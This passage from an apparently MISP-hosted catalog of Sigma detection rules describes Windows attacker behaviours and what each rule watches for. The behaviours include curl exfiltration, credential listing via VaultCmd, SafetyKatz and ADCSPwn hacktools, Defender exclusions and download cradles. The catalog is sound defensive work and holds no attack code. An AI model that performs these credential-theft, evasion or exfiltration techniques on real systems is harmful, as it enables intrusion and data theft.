- https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/ - webarchive
- https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_user_default_accounts_manipulation.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-01 |
| falsepositive | ['Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your environment. If you experience a lot of FP you could reduce the level to medium'] |
| filename | proc_creation_win_net_user_default_accounts_manipulation.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1560.001'] |
Hardware Model Reconnaissance Via Wmic.EXE
Detects the execution of WMIC with "csproduct", which is used to obtain information such as hardware models and vendor information.
Internal MISP references
UUID 3e3ceccd-6c06-48b8-b5ff-ab1d25db8c1d which can be used as unique global reference for Hardware Model Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.uptycs.com/blog/kuraystealer-a-bandit-using-discord-webhooks - webarchive
- https://jonconwayuk.wordpress.com/2014/01/31/wmic-csproduct-using-wmi-to-identify-make-and-model-of-hardware/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_csproduct.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2023-02-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wmic_recon_csproduct.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1047', 'car.2016-03-002'] |
Remote Access Tool - UltraViewer Execution
An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc., to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and TeamViewer are used frequently by adversaries when compared with other legitimate software. (Citation: Symantec Living off the Land)
Internal MISP references
UUID 88656cec-6c3b-487c-82c0-f73ebb805503 which can be used as unique global reference for Remote Access Tool - UltraViewer Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-09-25 |
| falsepositive | ['Legitimate use'] |
| filename | proc_creation_win_remote_access_tools_ultraviewer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1219.002'] |
Use of OpenConsole
Detects usage of the OpenConsole binary as a LOLBIN to launch other binaries and bypass application whitelisting.
Internal MISP references
UUID 814c95cc-8192-4378-a70a-f1aafd877af1 which can be used as unique global reference for Use of OpenConsole in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-06-16 |
| falsepositive | ['Legitimate use by an administrator'] |
| filename | proc_creation_win_lolbin_openconsole.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Curl Web Request With Potential Custom User-Agent
Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accepts specific "User-Agent" strings.
Internal MISP references
UUID 85de1f22-d189-44e4-8239-dc276b45379b which can be used as unique global reference for Curl Web Request With Potential Custom User-Agent in MISP communities and other software using the MISP galaxy
External references
- https://labs.withsecure.com/publications/fin7-target-veeam-servers - webarchive
- https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-07-27 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_curl_custom_user_agent.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
NtdllPipe Like Activity Execution
Detects commands that type the content of ntdll.dll to a different file or a pipe in order to evade AV/EDR detection, as seen in the NtdllPipe POC.
Internal MISP references
UUID bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 which can be used as unique global reference for NtdllPipe Like Activity Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-03-05 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_cmd_ntdllpipe_redirect.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion'] |
Suspicious File Encoded To Base64 Via Certutil.EXE
Detects the execution of certutil with the "encode" flag to encode a file to base64 where the file's extension is suspicious.
Internal MISP references
UUID ea0cdc3e-2239-4f26-a947-4e8f8224e464 which can be used as unique global reference for Suspicious File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy
External references
- https://www.virustotal.com/gui/file/35c22725a92d5cb1016b09421c0a6cdbfd860fd4778b3313669b057d4a131cb7/behavior - webarchive
- https://www.virustotal.com/gui/file/34de4c8beded481a4084a1fd77855c3e977e8ac643e5c5842d0f15f7f9b9086f/behavior - webarchive
- https://www.virustotal.com/gui/file/427616528b7dbc4a6057ac89eb174a3a90f7abcf3f34e5a359b7a910d82f7a72/behavior - webarchive
- https://www.virustotal.com/gui/file/4abe1395a09fda06d897a9c4eb247278c1b6cddda5d126ce5b3f4f499e3b8fa2/behavior - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_encode_susp_extensions.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-05-15 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_certutil_encode_susp_extensions.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1027'] |
Potential SysInternals ProcDump Evasion
Detects uses of the Sysinternals ProcDump utility in which ProcDump or its output gets renamed, or a dump file is moved or copied to a different name.
Internal MISP references
UUID 79b06761-465f-4f88-9ef2-150e24d3d737 which can be used as unique global reference for Potential SysInternals ProcDump Evasion in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-01-11 |
| falsepositive | ['False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming'] |
| filename | proc_creation_win_sysinternals_procdump_evasion.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036', 'attack.t1003.001', 'attack.credential-access'] |
Related clusters
To see the related clusters, click here.
Taskmgr as LOCAL_SYSTEM
Detects the creation of a taskmgr.exe process in the context of LOCAL_SYSTEM
Internal MISP references
UUID 9fff585c-c33e-4a86-b3cd-39312079a65f which can be used as unique global reference for Taskmgr as LOCAL_SYSTEM in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2018-03-18 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_taskmgr_localsystem.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
Windows Credential Manager Access via VaultCmd
Detects the listing of credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
Internal MISP references
UUID 58f50261-c53b-4c88-bd12-1d71f12eda4c which can be used as unique global reference for Windows Credential Manager Access via VaultCmd in MISP communities and other software using the MISP galaxy
External references
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vaultcmd_list_creds.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-04-08 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_vaultcmd_list_creds.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1555.004'] |
Related clusters
To see the related clusters, click here.
Firewall Rule Deleted Via Netsh.EXE
Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
Internal MISP references
UUID 1a5fefe6-734f-452e-a07d-fc1c35bce4b2 which can be used as unique global reference for Firewall Rule Deleted Via Netsh.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-08-14 |
| falsepositive | ['Legitimate administration activity', 'Software installations and removal'] |
| filename | proc_creation_win_netsh_fw_delete_rule.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.004'] |
Related clusters
To see the related clusters, click here.
Suspicious Extrac32 Alternate Data Stream Execution
Detects the use of extrac32 to extract data from a cab file and hide it in an alternate data stream
Internal MISP references
UUID 4b13db67-0c45-40f1-aba8-66a1a7198a1e which can be used as unique global reference for Suspicious Extrac32 Alternate Data Stream Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2021-11-26 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_lolbin_extrac32_ads.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1564.004'] |
Related clusters
To see the related clusters, click here.
Suspicious Execution of Powershell with Base64
Detects a command line that launches PowerShell with a Base64-encoded payload
Internal MISP references
UUID fb843269-508c-4b76-8b8d-88679db22ce7 which can be used as unique global reference for Suspicious Execution of Powershell with Base64 in MISP communities and other software using the MISP galaxy
External references
- https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/ - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets - webarchive
- https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_encode.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-01-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_encode.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059.001'] |
Related clusters
To see the related clusters, click here.
Potential File Download Via MS-AppInstaller Protocol Handler
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
Internal MISP references
UUID 180c7c5c-d64b-4a63-86e9-68910451bc8b which can be used as unique global reference for Potential File Download Via MS-AppInstaller Protocol Handler in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel |
| creation_date | 2023-11-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_ms_appinstaller_download.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.execution', 'attack.t1218'] |
Related clusters
To see the related clusters, click here.
Suspicious Electron Application Child Processes
Detects suspicious child processes of Electron apps (Teams, Discord, Slack, etc.). This could be a potential sign of ".asar" file tampering (see the reference section for more information) or binary execution proxying through specific CLI arguments (see related rule)
Internal MISP references
UUID f26eb764-fd89-464b-85e2-dc4a8e6e77b8 which can be used as unique global reference for Suspicious Electron Application Child Processes in MISP communities and other software using the MISP galaxy
External references
- https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/ - webarchive
- https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf - webarchive
- https://github.com/mttaggart/quasar - webarchive
- https://taggart-tech.com/quasar-electron/ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Msedge/ - webarchive
- https://lolbas-project.github.io/lolbas/Binaries/Teams/ - webarchive
- https://positive.security/blog/ms-officecmd-rce - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_electron_app_children.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-21 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_susp_electron_app_children.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Suspicious Script Execution From Temp Folder
Detects suspicious script executions from a temporary folder
Internal MISP references
UUID a6a39bdb-935c-4f0a-ab77-35f4bbf44d33 which can be used as unique global reference for Suspicious Script Execution From Temp Folder in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton |
| creation_date | 2021-07-14 |
| falsepositive | ['Administrative scripts'] |
| filename | proc_creation_win_susp_script_exec_from_temp.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.t1059'] |
Related clusters
To see the related clusters, click here.
HackTool - SafetyKatz Execution
Detects the execution of the hacktool SafetyKatz via PE information and default Image name
Internal MISP references
UUID b1876533-4ed5-4a83-90f3-b8645840a413 which can be used as unique global reference for HackTool - SafetyKatz Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-10-20 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_safetykatz.yml |
| level | critical |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.credential-access', 'attack.t1003.001'] |
Related clusters
To see the related clusters, click here.
Suspicious Process Masquerading As SvcHost.EXE
Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location. Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
Internal MISP references
UUID be58d2e2-06c8-4f58-b666-b99f6dc3b6cd which can be used as unique global reference for Suspicious Process Masquerading As SvcHost.EXE in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Swachchhanda Shrawan Poudel |
| creation_date | 2024-08-07 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_svchost_masqueraded_execution.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1036.005'] |
Related clusters
To see the related clusters, click here.
Computer Password Change Via Ksetup.EXE
Detects password change for the computer's domain account or host principal via "ksetup.exe"
Internal MISP references
UUID de16d92c-c446-4d53-8938-10aeef41c8b6 which can be used as unique global reference for Computer Password Change Via Ksetup.EXE in MISP communities and other software using the MISP galaxy
External references
- https://twitter.com/Oddvarmoe/status/1641712700605513729 - webarchive
- https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-04-06 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_ksetup_password_change_computer.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Suspicious Windows Service Tampering
Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. This has been seen being used in some ransomware scripts
Internal MISP references
UUID ce72ef99-22f1-43d4-8695-419dcb5d9330 which can be used as unique global reference for Suspicious Windows Service Tampering in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/windows/win32/cimwin32prov/delete-method-in-class-win32-service - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg - webarchive
- https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html - webarchive
- https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 - webarchive
- https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems), frack113, X__Junior (Nextron Systems) |
| creation_date | 2022-09-01 |
| falsepositive | ['Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry'] |
| filename | proc_creation_win_susp_service_tamper.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.impact', 'attack.t1489', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
Data Export From MSSQL Table Via BCP.EXE
Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.
Internal MISP references
UUID c615d676-f655-46b9-b913-78729021e5d7 which can be used as unique global reference for Data Export From MSSQL Table Via BCP.EXE in MISP communities and other software using the MISP galaxy
External references
- https://research.nccgroup.com/2018/03/10/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/ - webarchive
- https://www.huntress.com/blog/attacking-mssql-servers-pt-ii - webarchive
- https://docs.microsoft.com/en-us/sql/tools/bcp-utility - webarchive
- https://www.huntress.com/blog/attacking-mssql-servers - webarchive
- https://asec.ahnlab.com/en/78944/ - webarchive
- https://asec.ahnlab.com/en/61000/ - webarchive
- https://news.sophos.com/en-us/2024/08/07/sophos-mdr-hunt-tracks-mimic-ransomware-campaign-against-organizations-in-india/ - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bcp_export_data.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Omar Khaled (@beacon_exe), MahirAli Khan (in/mahiralikhan), Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2024-08-20 |
| falsepositive | ['Legitimate data export operations.'] |
| filename | proc_creation_win_bcp_export_data.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution', 'attack.exfiltration', 'attack.t1048'] |
Related clusters
To see the related clusters, click here.
Suspicious Child Process Of Wermgr.EXE
Detects suspicious child processes of the Windows Error Reporting manager (wermgr.exe)
Internal MISP references
UUID 396f6630-f3ac-44e3-bfc8-1b161bc00c4e which can be used as unique global reference for Suspicious Child Process Of Wermgr.EXE in MISP communities and other software using the MISP galaxy
External references
- https://github.com/binderlabs/DirCreate2System - webarchive
- https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html - webarchive
- https://www.echotrail.io/insights/search/wermgr.exe - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2022-10-14 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_wermgr_susp_child_process.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.privilege-escalation', 'attack.t1055', 'attack.t1036'] |
Related clusters
To see the related clusters, click here.
Powershell Defender Exclusion
Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets
Internal MISP references
UUID 17769c90-230e-488b-a463-e05c08e9d48f which can be used as unique global reference for Powershell Defender Exclusion in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - webarchive
- https://twitter.com/AdamTheAnalyst/status/1483497517119590403 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_defender_exclusion.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-04-29 |
| falsepositive | ['Possible Admin Activity', 'Other Cmdlets that may use the same parameters'] |
| filename | proc_creation_win_powershell_defender_exclusion.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.defense-evasion', 'attack.t1562.001'] |
Related clusters
To see the related clusters, click here.
HackTool - ADCSPwn Execution
Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an Active Directory network by coercing authentication from machine accounts and relaying it to the certificate service
Internal MISP references
UUID cd8c163e-a19b-402e-bdd5-419ff5859f12 which can be used as unique global reference for HackTool - ADCSPwn Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Florian Roth (Nextron Systems) |
| creation_date | 2021-07-31 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_hktl_adcspwn.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.credential-access', 'attack.t1557.001'] |
Related clusters
To see the related clusters, click here.
Potentially Suspicious Execution Of PDQDeployRunner
Detects suspicious execution of "PDQDeployRunner", which is part of the PDQDeploy service stack that is responsible for executing commands and packages on remote machines
Internal MISP references
UUID 12b8e9f5-96b2-41e1-9a42-8c6779a5c184 which can be used as unique global reference for Potentially Suspicious Execution Of PDQDeployRunner in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-07-22 |
| falsepositive | ['Legitimate use of the PDQDeploy tool to execute these commands'] |
| filename | proc_creation_win_pdqdeploy_runner_susp_children.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.execution'] |
Sysinternals PsSuspend Execution
Detects usage of Sysinternals PsSuspend which can be abused to suspend critical processes
Internal MISP references
UUID 48bbc537-b652-4b4e-bd1d-281172df448f which can be used as unique global reference for Sysinternals PsSuspend Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2023-03-23 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_sysinternals_pssuspend_execution.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.discovery', 'attack.persistence', 'attack.t1543.003'] |
Related clusters
To see the related clusters, click here.
Suspicious Service Path Modification
Detects service path modification via the "sc" binary to a suspicious command or path
Internal MISP references
UUID 138d3531-8793-4f50-a2cd-f291b2863d78 which can be used as unique global reference for Suspicious Service Path Modification in MISP communities and other software using the MISP galaxy
External references
- https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html - webarchive
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_service_path_modification.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-10-21 |
| falsepositive | ['Unlikely'] |
| filename | proc_creation_win_sc_service_path_modification.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.privilege-escalation', 'attack.t1543.003'] |
Related clusters
To see the related clusters, click here.
Renamed Vmnat.exe Execution
Detects a renamed vmnat.exe or a portable version that can be used for DLL side-loading
Internal MISP references
UUID 7b4f794b-590a-4ad4-ba18-7964a2832205 which can be used as unique global reference for Renamed Vmnat.exe Execution in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | elhoim |
| creation_date | 2022-09-09 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_renamed_vmnat.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.defense-evasion', 'attack.t1574.001'] |
Related clusters
To see the related clusters, click here.
PowerShell Get-Clipboard Cmdlet Via CLI
Detects usage of the 'Get-Clipboard' cmdlet via CLI
Internal MISP references
UUID b9aeac14-2ffd-4ad3-b967-1354a4e628c3 which can be used as unique global reference for PowerShell Get-Clipboard Cmdlet Via CLI in MISP communities and other software using the MISP galaxy
External references
- https://github.com/OTRF/detection-hackathon-apt29/issues/16 - webarchive
- https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_get_clipboard.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2020-05-02 |
| falsepositive | ['Unknown'] |
| filename | proc_creation_win_powershell_get_clipboard.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.collection', 'attack.t1115'] |
Related clusters
To see the related clusters, click here.
Potential COM Objects Download Cradles Usage - Process Creation
Detects usage of COM objects that can be abused to download files in PowerShell by CLSID
Internal MISP references
UUID 02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf which can be used as unique global reference for Potential COM Objects Download Cradles Usage - Process Creation in MISP communities and other software using the MISP galaxy
External references
- https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0 - webarchive
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57 - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_download_com_cradles.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | frack113 |
| creation_date | 2022-12-25 |
| falsepositive | ['Legitimate use of the library'] |
| filename | proc_creation_win_powershell_download_com_cradles.yml |
| level | medium |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.command-and-control', 'attack.t1105'] |
Related clusters
To see the related clusters, click here.
Suspicious Process By Web Server Process
Detects potentially suspicious processes being spawned by a web server process which could be the result of a successfully placed web shell or exploitation
Internal MISP references
UUID 8202070f-edeb-4d31-a010-a26c72ac5600 which can be used as unique global reference for Suspicious Process By Web Server Process in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
| author | Thomas Patzke, Florian Roth (Nextron Systems), Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2019-01-16 |
| falsepositive | ['Particular web applications may spawn a shell process legitimately'] |
| filename | proc_creation_win_webshell_susp_process_spawned_from_webserver.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.persistence', 'attack.initial-access', 'attack.t1505.003', 'attack.t1190'] |
Related clusters
To see the related clusters, click here.
Suspicious Schtasks Schedule Types
Detects scheduled task creation or modification with a suspicious schedule type
Internal MISP references
UUID 24c8392b-aa3c-46b7-a545-43f71657fe98 which can be used as unique global reference for Suspicious Schtasks Schedule Types in MISP communities and other software using the MISP galaxy
External references
- http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change - webarchive
- https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create - webarchive
- https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type.yml - webarchive
Associated metadata
| Metadata key | Value |
|---|---|
| author | Nasreddine Bencherchali (Nextron Systems) |
| creation_date | 2022-09-09 |
| falsepositive | ['Legitimate processes that run at logon. Filter according to your environment'] |
| filename | proc_creation_win_schtasks_schedule_type.yml |
| level | high |
| logsource.category | process_creation |
| logsource.product | windows |
| tags | ['attack.privilege-escalation', 'attack.persistence', 'attack.execution', 'attack.t1053.005'] |
Related clusters
To see the related clusters, click here.
Delete All Scheduled Tasks
Detects the usage of schtasks with the delete flag and the asterisk symbol to delete all tasks from the schedule of the local computer, including tasks scheduled by other users.
Internal MISP references
UUID 220457c1-1c9f-4c2e-afe6-9598926222c1 which can be used as unique global reference for Delete All Scheduled Tasks in MISP communities and other software using the MISP galaxy
External references
Associated metadata
| Metadata key | Value |
|---|---|
